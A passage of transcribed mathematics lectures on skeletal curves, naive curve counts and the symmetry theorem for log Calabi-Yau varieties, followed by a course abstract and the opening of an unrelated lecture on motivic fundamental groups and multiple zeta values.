to the skeletal curve.
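Summarizing the statement and the resulting canonical tropicalization in symbols (my notation, following the discussion above): for the base-changed map f_Y and the punctured curve C_0,
\[
\exists\, x\in C(K)\ \text{with}\ f_Y(x)\in \mathrm{Sk}(U)
\ \Longrightarrow\
f_Y\big(\mathrm{Sk}(C_{0,K'})\big)\subset \mathrm{Sk}(U),
\qquad
\text{spine}\;:=\;f_Y\big|_{\mathrm{Sk}(C_{0,K'})}\colon\ \Gamma\ \longrightarrow\ \mathrm{Sk}(U).
\]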
In the example above, the associated spine is simply the map from the red subtree to the blue plane, and it is canonical, independent of any choice of retraction. Now let me explain the idea of the proof of the skeletal curve theorem. Let us first recall the statement: we have a non-archimedean field extension K ⊂ K′ and a nodal rational curve C over K, and we consider a K′-analytic map f from the base change of C to the base change of Y such that the curve meets only essential boundary divisors, at K-points; we consider the composition f_Y of f with the projection from the base change. The claim is that if f_Y sends some K-point of the curve to the essential skeleton of U, then f_Y sends the skeleton of the base change of the punctured curve — C minus all the marked points — into the essential skeleton of U; in other words, the whole skeleton of the curve lies in the essential skeleton of U. Here is the idea of the proof. We put the map f into a family, consider the skeleton of the family and the skeleton of the base, and relate the various skeletons to one another. To put the map into a family, we naturally consider a Hom space of maps from the curve to Y^an, and we take H, the subspace of this Hom space consisting of all maps f from C to Y^an with the same curve class and the same intersection pattern with D as the given one. We have the following diagram: over H we have the universal curve, which is just the product C × H — since H is a space of maps, the domain curve does not change — with the two projections p_C to C and p_H to H; we have the universal map from the universal curve to Y^an, which we denote by e; and we consider the map Φ from the universal curve to C × Y^an whose first factor is the projection to C and whose second factor is the universal map. By the deformation theory of curves, the map Φ is étale over a dense Zariski-open subset of the target; it is generically étale. Furthermore, using the deformation theory of curves, by computing the tangent spaces of H, we show that the volume form ω on U gives rise to a volume form ω_H on H: it induces a natural volume form ω_H. Then we do an explicit computation: one can see that the pullback of ω by e and the pullback of ω_H by the projection p_H agree on the p_H-horizontal tangent spaces of the universal curve — they may not agree completely, but they agree on horizontal tangent spaces. This implies that for any 1-form α on the punctured curve C_0, the pullback of α by p_C wedged with the pullback of ω by e equals the pullback of α by p_C wedged with the pullback of ω_H by p_H: since the two forms agree on horizontal tangent spaces, wedging with anything vertical gives equality. We denote this by equality (⋆). Second, for any K-rational point x of C which is not one of the marked points p_i, we consider the evaluation map at x, ev_x, from the space of maps H to the analytification of U: we simply evaluate at x.
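For the record, here is the key equality (⋆) and the evaluation map in symbols; the notation matches the diagram just described, and this is only a rewriting of what was said.
\[
(\star)\qquad p_C^{*}\alpha\ \wedge\ e^{*}\omega \;=\; p_C^{*}\alpha\ \wedge\ p_H^{*}\omega_H
\quad\text{on the universal curve over } C_0,
\qquad
\mathrm{ev}_x\colon H\longrightarrow U^{\mathrm{an}},\quad f\longmapsto f(x).
\]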
Then, since such an x gives a horizontal section of the projection p_H, and the two forms agree on horizontal tangent spaces, pulling back along this horizontal section we see immediately that the pullback of ω by ev_x equals the volume form ω_H. This implies that the preimage of the essential skeleton of U under ev_x equals the skeleton of H associated to the volume form ω_H: again by the deformation theory of curves, the evaluation map ev_x is generically étale, and therefore the preimage of a skeleton is the skeleton of the pullback — this is the preimage of a skeleton, but by the étaleness of ev_x the preimage of the skeleton is the skeleton of the pullback, and ω_H is that pullback. We denote this by equality (⋆⋆). Now let us pick one fiber of our family. Choose any point F of H, the space of maps, and denote by C_F the fiber of the universal curve at F; recall that the universal curve is just a product, so the fiber at F is a base change of C. The point F gives a map from the fiber C_F to Y^an, which is just the restriction of the universal map e, and it is natural to denote this map by f, because it is really given by F. Now assume that f(x) lies in the essential skeleton of U for some K-rational point x. Since f(x) is just the evaluation of F at x, the equality (⋆⋆) implies that F lies in the skeleton associated to the volume form ω_H: f(x) ∈ Sk(U) means that ev_x(F) lies in Sk(U), which means that F lies in the preimage of Sk(U) under ev_x, which is the skeleton Sk(ω_H). So we get a very nice characterization of F just from our hypothesis. Recall that our goal is to show that f maps the skeleton of the punctured fiber C_{0,F} into the essential skeleton of U. To show this, let us compute the preimage under Φ of the product Sk(C_0) × Sk(U). By definition, the essential skeleton of C_0 is the union of the skeletons associated to all possible log volume forms on C_0 (here, taking the union over log volume forms or over log pluricanonical forms gives the same result); this first equality is just the definition of the essential skeleton. Next, using Temkin's metrization theory, one can show that a product of skeletons is the skeleton of the product, so this product of skeletons equals the skeleton of the product form. Next, recall that Φ is generically étale by deformation theory; this implies that the preimage of a skeleton is the skeleton of the pullback, so the preimage of this skeleton under the étale map Φ equals the skeleton of the pullback of the form by Φ. Now recall that, by definition, Φ has two factors: the first factor is the projection to C and the second factor is the universal map.
And by the definition of phi, this is just equal to the skeleton of the pullback of alpha by p_C wedged with the pullback of omega by e. Now we apply our explicit computation, the equality (*) of forms on horizontal tangent spaces, and we deduce that this is equal to the skeleton of the wedge product in which the pullback of omega by e is replaced by the pullback of omega_H by p_H. To summarize, this, by definition again, is just the essential skeleton of the punctured curve C° times the skeleton of H associated to omega_H. And we observe that, by Temkin's metrization theory, a point z lies in the skeleton of a product X x Y if and only if it projects to a point in the skeleton of Y and z lies in the skeleton of the fiber. So a point lies in the skeleton of a product if and only if it projects to the skeleton of the base and moreover lies in the skeleton of the fiber. Since F lies in the skeleton associated to the form omega_H (we think of H as the base here), for any x in the skeleton of the fiber, that is, of the punctured fiber at F, the computation above, the equality between the first and the last lines, shows that x lies in the preimage of the product of skeletons. Indeed, by what we just said, F already lies in the skeleton of the base; now, if we choose any point in the skeleton of the fiber, then this point actually lies in the skeleton of the total space, and that is just equal to the preimage of the product of skeletons. This shows that x lies in the preimage under phi of the product of skeletons, and, recalling the definition of phi, we deduce that f maps the skeleton of the punctured fiber at F to the essential skeleton of U. In other words, the skeleton of the curve maps to the essential skeleton of U. So the proof is complete. Remark: by adding extra K-points of our curve C as marked points, the above argument gives a stronger and perhaps more surprising result. We can show that the convex hull of all K-rational points inside the fiber C_F maps to the closed essential skeleton of U, which is just the closure of the essential skeleton in the fixed compactification. So not only does the skeleton of the curve map to the skeleton of the target, but the convex hull of all K-points lies there as well. That is all I want to say about the proof of the skeletal curve theorem, and if you did not follow every line of the proof, no worries. Now we will move to the next topic. The question is: skeletal curves seem so nice, they have canonical tropicalizations and we will be using them for many purposes, so the natural question is, where do they come from in practice? In the next section we will talk about the natural sources of skeletal curves. Let's first take a five-minute break before moving on to the next section. So, skeletal curves seem so nice, but where do they come from in practice? That's what I will explain in the next part of this lecture. So let's explain where skeletal curves come from. Recall from the Frobenius structure conjecture that we are interested in counting rational curves in Y with prescribed intersections with the boundary D.
So we have Y, an SNC compactification of our log Calabi-Yau U, and we are interested in counting this kind of red curve, whose intersection numbers with the boundary divisors are fixed. We can also phrase it in terms of the interior: in other words, we are interested in punctured rational curves in U with prescribed asymptotics at the punctures. Either way, U is what we ultimately care about. So let's fix some notation for convenience. We have a tuple, bold P, consisting of P_j, where the P_j are integer points in the skeleton. In my last lecture I gave an explicit formula for Sk(U, Z): it is just {0} together with the positive integer multiples of the essential divisorial valuations. And now, in this lecture, I have explained the theory of the essential skeleton, and these are just the integer points inside the essential skeleton. So we fix this tuple in order to prescribe the intersections of our red curve with the boundary D. Some P_j can be zero, and we call such j internal marked points. For example, we can have an internal marked point P_4, internal because it maps to the interior. For nonzero P_j we call such j boundary marked points, because these marked points are supposed to go to the boundary, and we write P_j in the explicit form P_j = m_j nu_j, a positive integer multiple of a divisorial valuation nu_j, which is just given by some divisor at infinity. We can always assume that nu_j is given by a component of our boundary D after making some blowup. Now let's consider the moduli stack M(U, bold P, beta) consisting of n-pointed rational stable maps from a nodal rational curve C, with marked points p_j, to Y, of class beta, such that each boundary marked point p_j meets the interior of the divisor D_j with tangency order m_j, and there are no other intersections with D. So this is exactly the sort of moduli stack we consider in the Frobenius structure conjecture. If we pick an internal marked point p_i, then we can evaluate at this internal marked point, and we obtain something in U. We can also take the domain and take the stabilization of the domain, and we obtain a point in the Deligne-Mumford stack of n-pointed stable rational curves. Recall that the domain of a stable map may not be stable, so we need to take a further stabilization in order to get a stable curve. Putting these together, we have the natural map phi_i, very analogous to the map phi that we considered in the proof of the skeletal curve theorem. And now we have the theorem on sources of skeletal curves, which says that phi_i has finite fibers over the skeleton inside the target, and moreover the fibers consist of skeletal curves; that is, the preimage under phi_i of this skeleton inside the product consists of skeletal curves. That is the way we produce skeletal curves in practice. Just a small point here: we consider the closure of the skeleton, so it is a bit stronger than considering only the skeleton. That is important in the theory, because we also want to consider degenerate domains. In the proof of associativity, for example, and also just in the classical theory of Gromov-Witten invariants, it is sometimes useful to degenerate stable maps and break them apart. That is why we also consider the closure of the skeleton, which will contain these degenerate curves. So that is the way we produce skeletal curves in practice. The proof is the following. For finiteness, we again use deformation theory.
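For orientation in the finiteness argument that follows, here is the map and the statement in symbols; the notation for the moduli stack, the stabilization map st and the evaluation map ev_i is partly my guess from the board, so treat this as a sketch.

\[
\varphi_i=(\mathrm{st},\ \mathrm{ev}_i)\colon\ \mathcal{M}(U,\mathbf{P},\beta)^{\mathrm{an}}\ \longrightarrow\ \overline{\mathcal{M}}_{0,n}^{\mathrm{an}}\times U^{\mathrm{an}},
\]

and the theorem says that phi_i has finite fibers over the closed skeleton \(\overline{\mathrm{Sk}}(\mathcal{M}_{0,n})\times \mathrm{Sk}(U)\) inside the target, with the preimage of this locus consisting of skeletal curves.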
We can show that, for any fixed modulus of the domain, the fiber of phi_i over that modulus is finite étale over some Zariski dense open subset of the log Calabi-Yau. And skeletalness follows from the skeletal curve theorem. Here, finiteness allows us to count curves naively, without using virtual fundamental classes. So let me explain now how we count them naively using this finiteness result; let me explain naive counts of skeletal curves. The theorem above on sources of skeletal curves suggests a simple definition of naive counts associated to spines in the essential skeleton of U, which we explain now, and the study of the properties of such counts is the main technical foundation of our theory. Recall that we have our natural map phi_i going from the moduli space of stable maps to the moduli space of stable curves, by taking the domain modulus, and to our log Calabi-Yau, by evaluating at some internal marked point. We have a canonically defined spine, which is just the restriction of f to the skeleton of our curve, and this maps to the skeleton of U by the skeletal curve theorem. Here we take the closure of the skeleton; it doesn't change much, it is just more convenient to work with, because otherwise we just have infinite curves, as in R^n; if we take the closure it is more convenient for notation, we can see where the points at infinity go. So that's a very minor point. Conversely, given any abstract spine h from some graph, some tree, to the skeleton of U, and some curve class beta, we want to count all skeletal curves of class beta giving rise to this spine h. So this is our goal now: we want to define the count N(h, beta), which is supposed to be the number of skeletal curves with spine h and curve class beta. First question: what is an abstract spine in the essential skeleton of U? First, observe that the essential skeleton of U has an intrinsic conical piecewise integral linear structure. The idea is the following: if we take any SNC compactification of U, we obtain a simplicial cone complex structure on the essential skeleton, and the structures given by two different SNC compactifications are related by a piecewise integral linear map. Therefore the essential skeleton has an intrinsic piecewise integral linear structure, and thus it makes sense to define a spine in the essential skeleton to be a piecewise integral affine map h from a nodal metric tree to the essential skeleton. Here is a picture. We consider such a nodal metric tree Gamma; this is our essential skeleton, and we consider a spine inside it. We denote by v_j the 1-valent vertices of Gamma. Let us first consider the case of extended spines; in other words, let's assume that all the v_j are infinite vertices. We denote by P_j the weight vector at each v_j, in other words just the derivative. These purple vectors are the P_j, and we collect all the P_j into a tuple, bold P. Here we have five 1-valent vertices, v_1, v_2, v_3, v_4, v_5, and v_5 shoots up vertically, which means that the leg at v_5 is mapped to a point: the map h can be constant on the whole leg, and in this case the derivative P_5 is zero. Recall that we said that the essential skeleton of M_{0,n} is homeomorphic to the moduli space of tropical curves with n legs. In fact, this also holds after taking closures: the closed essential skeleton of M_{0,n} is homeomorphic to the moduli space of stable extended nodal rational tropical curves with n legs.
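In symbols, and only as my transcription of the statement (exactly which compactification the skeleton is taken with respect to is the speaker's convention), the identifications read:

\[
\mathrm{Sk}\big(\mathcal{M}_{0,n}\big)\ \cong\ M^{\mathrm{trop}}_{0,n},
\qquad
\overline{\mathrm{Sk}}\big(\mathcal{M}_{0,n}\big)\ \cong\ \overline{M}^{\mathrm{trop}}_{0,n},
\]

where the right-hand sides are the moduli spaces of (stable extended) nodal rational tropical curves with n legs.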
That's Gamma. Sorry. Yeah. Oh, I have a question on this: is this M-trop-bar just the naive closure of the tropicalization? M-trop-bar is a compactification of the moduli space of tropical curves. So you allow internal legs of infinite length? The legs, yes, I allow some edges to have infinite length. Because, I don't know, I think Jonathan Wise and Melody Chan have defined this M-trop-bar; is it coinciding with their definition? So this is the M-trop-bar for genus zero with n legs, and I think it was first considered in the paper by Abramovich, Caporaso and Payne. It is called the tropicalization of the moduli space of stable curves, probably, and with Sean we show that here the essential skeleton is just the skeleton given by the classical Deligne-Mumford compactification, and then we apply a result in the paper of Abramovich, Caporaso and Payne which identifies the skeleton associated to the Deligne-Mumford compactification with this moduli space of extended tropical curves. Okay, thanks. They are really natural objects when we consider compactifications. So we have our nodal metric tree, and it is just a point in this moduli space of tropical curves. By this homeomorphism, we obtain a point in the skeleton of M_{0,n}; and recall that we have our natural map phi_i from the moduli space of analytic stable maps to the moduli space of domains times our log Calabi-Yau, and inside the target we have a product of skeletons. So we have a point Gamma in the skeleton of the first factor, and we also have the point h(v_i), in this picture just the point h(v_5), in the skeleton of U. The pair together gives a point in the target. Now we just take the preimage under phi_i of this point in the target. By the theorem above, the preimage is a finite set and consists only of skeletal curves. But now we have a finite set, and not all curves inside this finite set are good, so we further restrict to a subset F_i(h, beta) consisting of the stable maps whose spine is equal to h. The preimage itself only says that our curve has the correct domain and that the internal marked point p_i maps to the correct place; that's all, it says nothing about the spine. That is why we consider the subset with the right spine. And then the count N_i(h, beta) that we wanted to define, that was our goal: we just let it be the length of this subset, considered as a zero-dimensional analytic space, because there may be nilpotents or multiplicities. If we pass to a big enough field, if we pass to an algebraic closure, then it is enough to take just the cardinality of this set. So we define the count N_i(h, beta) to be this length; N_i(h, beta) just means the number of skeletal curves associated to the spine h and the curve class beta, obtained by evaluating at the i-th marked point. Intuitively, this number counts these purple closed rational curves with the given red spine. More generally, we also consider non-extended spines, sometimes called truncated spines; in other words, we allow some 1-valent vertices v_j to be finite. The idea is to use the toric tail condition to define the counts associated to truncated spines, as in the first lecture.
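Before turning to truncated spines, let me record the extended-spine count just defined in symbols; notation as above, with (Gamma, h(v_i)) the point of the product of skeletons determined by the spine.

\[
F_i(h,\beta)\ :=\ \big\{\,[f]\in \varphi_i^{-1}\big(\Gamma,\ h(v_i)\big)\ :\ \mathrm{spine}(f)=h \,\big\},
\qquad
N_i(h,\beta)\ :=\ \mathrm{length}\ F_i(h,\beta),
\]

the length being taken of F_i(h, beta) viewed as a zero-dimensional analytic space.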
Here is the picture: we have the skeleton of our log Calabi-Yau and we consider a truncated spine. Here the vertices v_1, v_3, v_4 are finite vertices, while v_2 and v_5 remain infinite vertices. In order to count the skeletal curves associated to such spines, recall that we have a torus inside U with cocharacter lattice M, and this implies that the essential skeleton of U is equal to the essential skeleton of the torus and is homeomorphic to M tensor R, that is, to R^n. Now we can extend the truncated spine h, together with the curve class, and we obtain an extended spine h-hat and an extended curve class beta-hat. I wrote everything regarding curve classes in blue just to mean that you can ignore it if you are not familiar with the theory; they are more auxiliary, so we can just focus on the spine. We apply the constructions above to this extended spine h-hat and extended curve class beta-hat, and we obtain a finite set F_i(h-hat, beta-hat) as above, consisting of closed curves with spine h-hat. Now we consider a further subset satisfying the toric tail condition: we ask each punctured tail disk to lie inside our torus. Then we are finally ready to define the count associated to such a truncated spine to be simply the length of this subset, considered as a zero-dimensional analytic space. Intuitively, this number counts this kind of open curves with the given spine, and by open we mean curves with boundaries. So that is the definition of our naive counts. And we have the following theorem concerning this counting number. Assume the spine h is in general position; more precisely, we assume h is transverse to the walls inside the skeleton of U. I will introduce the notion of walls in the next lecture; here, let's just imagine that h is in some general position. Then the count N_i(h, beta), meaning the number of skeletal curves associated to the spine h and the curve class beta, obtained by evaluating at the i-th marked point, is independent of the choice of the internal marked point i, and also of the choice of the torus inside U. Remark: the independence of i used to be called the symmetry theorem, and it had a tricky proof via deformation invariance. Now we have a much more conceptual proof via skeletal curves, which I will sketch below. So that shows another application of skeletal curves: we get a conceptual understanding of this independence of the choice of the marked point where we evaluate. If there are any questions you can ask; otherwise I'll just go to the proof of the symmetry theorem. So let me explain the symmetry theorem via skeletal curves. The symmetry theorem is just the independence of our count from the choice of the point where we evaluate. I mean, if you think about why this is true, it is not really obvious, because we evaluate at an internal marked point i and we want to show that the count doesn't depend on the choice of this internal marked point. So maybe, if we have two different places where we evaluate, we want to move from one place to the other. But the trouble is that when we move from one place to another, at some point we will cross some walls, and the spine is no longer transverse. So this kind of deformation invariance no longer holds if we move across walls; in general, we will have some wall-crossing formula if we move across a wall.
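Before the proof, here are the truncated-spine count and the statement we are about to discuss, in symbols; the superscript TT is just my shorthand for the toric-tail subset, and the rest of the notation is as above.

\[
N(h,\beta)\ :=\ \mathrm{length}\ F^{\mathrm{TT}}_i(\hat h,\hat\beta),
\qquad
F^{\mathrm{TT}}_i(\hat h,\hat\beta)\ \subset\ F_i(\hat h,\hat\beta),
\]

the subset of maps whose punctured tail disks lie inside the torus; the theorem then says that for h transverse to the walls this number is independent of the internal marked point i and of the chosen torus.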
And here, the way we want to show it via skeletal curves is that we can actually move through the walls if the curve is skeletal. So let me give more details. The idea is to move from one place to another in the skeletal curve setting, and in that setting we can go through the walls without any complicated wall-crossing formula. Yeah, so let's recall the setting from the proof of the skeletal curve theorem. We have a Hom scheme parametrizing maps from the domain curve C to the target Y, and we consider the subspace consisting of maps with the given intersection pattern with the boundary and the given class beta. We also had the natural maps: over H we have the universal curve, with its two projections; the universal curve is just a product; and we have the natural map phi, whose first factor is just the projection to C and whose second factor is the universal map. On Y we have the volume form omega, and on H, by deformation theory, we produced a volume form omega_H. For any point F in H we denote by C_F the fiber of the universal curve at F, and we denote the induced map again by f, because that is what F means. So recall from the proof of the skeletal curve theorem that f being skeletal is equivalent to F lying in the skeleton of H associated to the volume form, and that phi(x) lies in the skeleton of the target if and only if F lies in the skeleton of H and x lies in the skeleton of the fiber. So that is what we have shown, the main point in the proof of the skeletal curve theorem. If you're confused about the rest, just... Yeah? You can't formally write "F lies in"; f of the curve, f is a map. F is a map, but F is also a point of the space of maps. Ah, of H. Ah, yes, sure. Sorry. Yeah, so F is a map, but it is also a point in the space of maps. Oh, okay. Sorry. Yeah, so here we really showed that f as a map is skeletal if and only if F as a point lies in the skeleton. Okay, okay. Yeah. So now we assume f to be skeletal; in other words, we assume that the point associated to the map lies in the skeleton. Then we have a canonically associated spine, which is just given by the restriction of f to the skeleton of the fiber, which is the same as the skeleton of the curve; it maps to the skeleton of U. So that's all we have done in the proof of the skeletal curve theorem. Now let Delta denote the graph of the spine h, and here we make a claim. Assume that the spine h is in general position, in other words that it is transverse to the walls. Then the skeleton of the fiber C_F, inside the preimage of Delta under phi, is a connected component. Recall from this equivalence, or just from the fact that the whole skeleton of the curve lies in the skeleton of U, that the skeleton of this fiber lies in the preimage; and we claim that this subset is a connected component. I drew a picture for your understanding. Recall that our natural map phi goes from the universal curve C x H to C x Y^an, and we have the graph Delta of the spine inside the target C x Y^an, and we have phi going from C x H. So this is C x H: H is the base, the space of maps, and the total space is the product C x H, so every fiber is a copy of the curve C. If we take the preimage of Delta under phi, by the finiteness of phi we obtain some graph inside the product C x H. The skeleton of the fiber C_F lives inside this preimage, because it goes to the skeleton, as we have a skeletal curve, but there are also some other pieces.
And the claim says that this fiber is actually a connected component: it does not touch the other fibers. It is not difficult to prove the claim. First, by the equivalence recalled above, we see that the skeleton of the fiber is equal to the fiber of the preimage over F. Since a fiber is always closed, this implies that the inclusion is closed, and we are left to prove that the inclusion is open. So suppose the contrary: we pick a germ of a path, like this green germ, from [0, epsilon) to the preimage of Delta under phi, starting from the skeleton of the fiber and then going out of it. Since alpha is a germ of a path in the preimage under phi, and we have shown that this preimage lies inside the product of the skeleton of C and the skeleton of H, we can write alpha as two components (q_t, f_t), where q_t is a point on the curve and f_t is a point in the moduli space of maps. Since everything is skeletal here, we denote by h_t the spine of f_t. And we observe that the condition that alpha lies in the preimage of Delta under phi, or that phi(alpha) lies in Delta, with Delta being the graph of h_0, just implies that h_t(q_t) = h_0(q_t). So we have a point q_t on our curve, and the condition says that, for this small deformation of our map, the image of this point does not move off h_0. Then, by the continuity of tropicalization from f_t to h_t and by the rigidity of transverse spines (I will give more details on this in the next lecture), we deduce immediately that this equality forces h_t to be constant. In other words, there is no way to perturb h_t, no way to perturb the spine while keeping this equality. Intuitively it is very simple: we have a spine and a point q_t, and we fix the image of that point; if the spine is transverse to the walls, we cannot move the spine, it is just fixed at that point. In other words, h_t is constant. And if h_t is constant, it means that (q_t, f_t) lives in the preimage of the fixed point (q_0, h_0(q_0)), and that is a contradiction to the quasi-finiteness of the map phi. I said that, by deformation theory, phi is finite étale generically over the target, so in particular it is quasi-finite; but here we just produced a germ in the preimage under phi of a single point, and that is a contradiction. So that completes the proof of the claim. Yeah, and the claim gives us this nice connected component. So I just explained the proof of the claim, but let us recapitulate what the statement of the claim is. We have our natural map phi from C x H to C x Y^an, and we have a skeletal curve f from C to Y^an, and we assume that the associated spine is transverse. Then the claim says that the skeleton of the fiber C_F, inside the preimage under phi of the graph of h, is a connected component. And now observe the following. First, observe that the first factor of phi records exactly where we evaluate for the second factor: the second factor of phi is the universal map, and the first factor of phi is the projection to C.
So the first factor determines where we are evaluating the second map. Furthermore, observe that we can take the degree of our map phi restricted to this skeleton of the fiber, and sum such degrees. Here the degree makes sense exactly because of the claim: we know that the map phi is finite étale generically over the target, so the degree makes sense; if we restrict to an arbitrary subset, the degree may no longer make sense, but here it still does, because we restrict this finite étale map to a connected component. The degree is then still well defined, because the map remains finite étale over some thickening of this connected component, some neighborhood. So the degree makes sense, and we take the sum of such degrees over all skeletal curves whose associated spine is equal to h. And that is exactly the following count: N_w(h_w, beta), where we count the number of skeletal curves associated to the spine h_w, which is just the spine h with an internal marked point added at w, meaning that we add an internal leg at w, which is a contracted leg. We then consider the count of skeletal curves associated to this augmented spine and the curve class beta, evaluating at the added marked point w. The left-hand side is equal to the right-hand side by the definition of this count. So now we can conclude the symmetry theorem for transverse spines: we see that the count N(h, beta) is independent of the choice of the internal marked point, because the left-hand side does not depend on the choice of w, while the right-hand side is the count of skeletal curves where we evaluate at the point w, and w is allowed to move everywhere. So the count is invariant when we move w anywhere along the spine, and this shows the symmetry theorem. Furthermore, we can show that adding or removing internal marked points does not affect the counts at all. So this is an illustration of how we use skeletal curves to establish important properties of our counts, and we will see further examples of that in later parts of the lectures. For the symmetry property, the symmetry theorem, we can actually give different proofs without passing through skeletal curves, but for other properties we must use skeletal curves. And here it is nice to see that, using skeletal curves, we really have the freedom of moving the point w everywhere; if the curve is not skeletal, there is no way to cross a wall while keeping the invariance, so in a proof of the symmetry theorem without skeletal curves we cannot move across walls. So that's what I wanted to explain today. In the next lecture I will talk about deformation invariance and also many other properties of the counts, which finally lead to the proof of the associativity of the mirror algebra. For deformation invariance, as we said, usually it only holds away from walls: when we cross a wall we are supposed to have a wall-crossing formula, and we no longer expect deformation invariance. But for skeletal curves there is actually a trickier deformation invariance, somewhat similar to this situation of moving the marked point across walls: for skeletal curves we can actually move across walls a little bit, as long as the spine is sufficiently transverse, even if not literally transverse. For non-skeletal curves, it must be transverse in order to have deformation invariance.
But for skeletal curves we can relax the transversality condition a little bit, and that is actually important in the proof of associativity and also in the proof of the wall-crossing formula. Because in associativity, I mean in the definition of the structure constants, if you remember from the last lecture, at the place where we evaluate we ask the point to go to Q. And although Q is a very generic point at the level of analytic geometry, it is a very special point at the level of tropical geometry. So all the spines that appear in the definition of the structure constants, as in the previous lecture, are all very special; they are not transverse at all. Of course we can make them transverse if we don't ask the marked point to go to Q but to some point sufficiently close to Q; but then we have the choice of asking it to go either to the left of the wall or to the right of the wall, or, if there are many more walls, we have even more choices of chambers. In general, we have the choice of asking it to go to the left or to the right, and it is not clear at all whether the structure constants for the marked point going to the left are equal to the structure constants for the marked point going to the right. For this passage from left to right across the wall, we have to use the theory of skeletal curves again. So I will explain more about that in the next lecture, next month. Thank you very much for your attention. Thank you very much. And maybe we have time for questions; or maybe I don't have time for questions. Actually, I have a very simple question. You have this variety H, which has the same dimension as Y, and it also has a logarithmic volume form. So it means that you can start to produce, from one log Calabi-Yau, another log Calabi-Yau, in a sense. And does this H contain the torus again, if you assume that Y contains the torus? This H is a cover of the torus; probably it is not a torus itself, it could be more. H is really the moduli space. I see. And also, we don't really have a good compactification of H, so it's not clear that it is log Calabi-Yau; it's a ramified cover. It's not clear whether it is log Calabi-Yau or not, because we only consider the essential skeleton of H associated to this particular volume form. Yes, yes. Maybe there are other volume forms. Yeah, or maybe this volume form has zeros. It can have zeros, yes. Okay, okay, so thank you.
|
We show that the naive counts of rational curves in an affine log Calabi-Yau variety U, containing an open algebraic torus, determine in a surprisingly simple way, a family of log Calabi-Yau varieties, as the spectrum of a commutative associative algebra equipped with a multilinear form. This is directly inspired by a very similar conjecture of Gross-Hacking-Keel in mirror symmetry, known as the Frobenius structure conjecture. Although the statement involves only elementary algebraic geometry, our proof employs Berkovich non-archimedean analytic methods. We construct the structure constants of the algebra via counting non-archimedean analytic disks in the analytification of U. We establish various properties of the counting, notably deformation invariance, symmetry, gluing formula and convexity. In the special case when U is a Fock-Goncharov skew-symmetric X-cluster variety, we prove that our algebra generalizes, and in particular gives a direct geometric construction of, the mirror algebra of Gross-Hacking-Keel-Kontsevich. The comparison is proved via a canonical scattering diagram defined by counting infinitesimal non-archimedean analytic cylinders, without using the Kontsevich-Soibelman algorithm. Several combinatorial conjectures of GHKK follow readily from the geometric description. This is joint work with S. Keel; the reference is arXiv:1908.09861. If time permits, I will mention another application of our theory to the study of the moduli space of polarized Calabi-Yau pairs, in a work in progress with P. Hacking and S. Keel. Here is a plan for each session of the mini-course: 1) Motivation and ideas from mirror symmetry, main results. 2) Skeletal curves: a key notion in the theory. 3) Naive counts, tail conditions and deformation invariance. 4) Scattering diagram, comparison with Gross-Hacking-Keel-Kontsevich, applications to cluster algebras, applications to moduli spaces of Calabi-Yau pairs.
|
10.5446/50999 (DOI)
|
Okay, so this is the fourth and final lecture, where I try to say all the things that I wish I'd said in earlier lectures. Unfortunately, I won't talk about mixed modular forms; I didn't get that far, and I apologize for that. But I will say a few things that I believe are important, and to illustrate what they are and what they mean, I will first motivate with the case of P1 minus 3 points. Even though I don't want to talk about P1 minus 3 points very much at all, I will just write down the key ingredients of the theory as I see them, and then I will replicate them, or give generalizations of them, in the case of M_{1,1}. So the zeroth section is motivation for this lecture from P1 minus 3 points, and I'm going to briefly summarize most of the ingredients in the motivic theory and say why they're important. So what we have here, as I've mentioned a few times already, are the Betti and de Rham fundamental groups. Oh sorry, they're not fundamental groups, they're fundamental torsors of paths, because we're going from zero to one. So this is the unipotent completion, the de Rham pi_1 of P1 minus 3 points, from the tangent vector of length one at zero to the tangent vector of length minus one at one. These are schemes over Q and they are connected to each other by a comparison isomorphism, which is a morphism of schemes. And then there's an element that plays a very important role, which is the droit chemin in the topological fundamental group: the straight-line path going from zero to one, or rather from the tangent vector of length one at zero to the tangent vector of length minus one at one; it is simply the straight line. Now my line is not very straight; let me do that again. So that's the droit chemin, and it gives an element of the rational points of the Betti fundamental group, and then we push it across into the de Rham fundamental group, and its image in the complex points of the de Rham fundamental group is the Drinfeld associator. I've explained that a number of times already: it is a sum over words in two letters, and the coefficients are shuffle-regularized multiple zeta values. And last time we discussed what the analogue of this should be in genus one, and discussed the analogues of the relations it satisfies, which in the case of the Drinfeld associator are the hexagon and pentagon equations. Right, so that we've more or less covered. So the next stage in the theory is to put in the motivic point of view. The way this is done these days (of course, in the early days we didn't have a category of mixed Tate motives, so you had to do something else) is to say that these schemes are the realizations of something else, the motivic fundamental group, which I'll write with a subscript M. So what it means to say that the scheme is a realization of a motive is that we have an object, which we think of as the affine ring of a scheme, which is an ind-object in a category of mixed Tate motives over the integers; its Betti realization is the affine ring of the Betti scheme, its de Rham realization is the affine ring of the de Rham scheme, and you have other realizations as well. This was defined by Deligne and Goncharov. Okay, so then what do you get from this? Well, the next stage in the story is to interpret this. A motive, or an object in an abelian category, a Tannakian category of motives, is simply a vector space plus the action of a group.
So the category of mixed Tate motives, because it is a Tannakian category, is the same as the category of representations of a certain affine group scheme, which I'm going to write down. My convention, if I do it correctly and consistently, is that these group schemes, the motivic Galois groups, will have curly G's, whereas all other groups will not have a tail; I hope I do that consistently. So a mixed Tate motive is simply a vector space plus the action of a particular group, which is the motivic Galois group of this category, the de Rham motivic Galois group, and this functor is the de Rham realization functor. So what we're getting is some schemes, plus the extra data of the group G_{MT(Z)} acting on the de Rham one. We get some object with a group acting on it, and this encodes all the motivic theory. Of course you can also replace de Rham with Betti if you like, but there's no loss of information in restricting to a single fiber functor, and de Rham is by far and away the most convenient in this story. So the point of this is that the structure of O(pi_1^M) as a motive is completely equivalent, by the Tannaka theorem, to the action of this group on the scheme pi_1^dR, and this in turn is completely equivalent to the action of this group on, I'd like to say multiple zeta values, but to make this rigorous I have to put a little "motivic" in brackets. So the first point is that this group action really contains all the information: it really knows everything that there is to know about the fundamental group of P1 minus 3 points. Actually, when you write the topological one, it goes to the Betti one? No, so, yeah, I skipped this because I did it last time: there's always a map from pi_1^top into the rational points of the Betti scheme, it's Zariski dense, and the same happens in relative completion, so I skip that step. So the way I prefer to think about this is that you can imagine there's a Galois theory of transcendental numbers like multiple zeta values, and the action of this Galois group on these numbers should be... That Galois action is clearly conjectural, but you can make it absolutely rigorous by replacing numbers with something called motivic periods, and then the action of this group is completely equivalent to an action on the motivic versions of these numbers. So that's something quite concrete, and it is used a lot, and the point is that it's all completely encoded in the data of this action. And without wishing to give an entire course on this, because I've done it before, you can deduce a lot of fun things: for example, to prove results here between multiple zeta values, well, between periods you just compute numbers, so you can prove them using complex analysis for example, and because of this equivalence 